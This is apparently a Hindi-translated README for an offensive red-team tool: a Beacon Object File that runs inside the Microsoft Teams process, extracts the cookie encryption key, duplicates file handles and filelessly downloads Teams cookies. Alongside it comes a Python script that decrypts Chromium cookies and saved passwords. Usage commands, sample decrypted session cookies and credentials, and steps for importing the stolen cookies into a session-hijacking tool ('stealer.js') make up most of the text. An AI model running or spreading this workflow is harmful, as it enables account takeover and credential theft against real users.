
Teams कुकीज़ चुराने के लिए BOF
ms-teams.exe प्रक्रिया के भीतर चलते हुए Teams के लिए कुकीज़ चुराएँ। संबंधित पोस्ट: https://tierzerosecurity.co.nz/2025/11/03/teams-cookies-bof.html
आधारित: https://blog.randorisec.fr/ms-teams-access-tokens/।
यह टूल बड़े पैमाने पर Cookie-Monster-BOF पर आधारित है।
BOF एन्क्रिप्शन कुंजी निकालेगा, कुकीज़ फ़ाइल के लिए हैंडल वाली msedgewebview2.exe प्रक्रियाओं का पता लगाएगा, हैंडल की प्रतिलिपि बनाएगा और फिर लक्ष्य फ़ाइल को फ़ाइललेस तरीके से डाउनलोड करेगा।
कुकीज़ डाउनलोड हो जाने के बाद, Python डिक्रिप्शन स्क्रिप्ट (नीचे देखें) का उपयोग उन रहस्यों को निकालने के लिए किया जा सकता है।
BOF को ms-teams.exe Teams प्रक्रिया के भीतर चलाया जाना चाहिए। BOF कोई तर्क नहीं लेता है।
संकलन से पहले सुनिश्चित करें कि Linux पर Mingw-w64 और make स्थापित हैं।
make
आवश्यकताएँ स्थापित करें
pip3 install -r requirements.txt
उपयोग
python3 decrypt.py -h
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]
Decrypt Chromium cookies and passwords given a key and DB file
options:
-h, --help show this help message and exit
-k KEY, --key KEY Decryption key
-o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
Option to choose
-f FILE, --file FILE Location of the database file
--chrome-aes-key CHROME_AES_KEY
Chrome AES Key
उदाहरण: Chrome/Edge कुकीज़ फ़ाइल डिक्रिप्ट करें
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Chrome AES कुंजी के साथ Chrome कुकीज़ डिक्रिप्ट करें
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json
Chrome/Edge कुकीज़ फ़ाइल डिक्रिप्ट करें और json में सहेजें
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json
कुकीज़ JSON फ़ाइल को https://cookie-editor.com/ के साथ आयात करें
Chome/Edge पासवर्ड फ़ाइल डिक्रिप्ट करें
python .\decrypt.py -k "\xec\xfc...." -o passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Firefox कुकीज़ और संग्रहीत क्रेडेंशियल डिक्रिप्ट करें:
https://github.com/lclevy/firepwd
डिक्रिप्ट स्क्रिप्ट में cuddlephish विकल्प जोड़ा गया है, जो https://github.com/fkasler/cuddlephish के साथ कुकी का उपयोग करने का समर्थन करना चाहिए।
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db
# Clone Project
cd
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish
# Install Dependencies Example on Debian
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install
# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json
2025 में Microsoft Teams एक्सेस टोकन चुराना:
https://blog.randorisec.fr/ms-teams-access-tokens/
Cookie-Monster-BOF:
https://github.com/KingOfTheNOPs/cookie-monster
Cookie Webkit मास्टर कुंजी एक्सट्रैक्टर:
https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
फ़ाइललेस डाउनलोड:
https://github.com/fortra/nanodump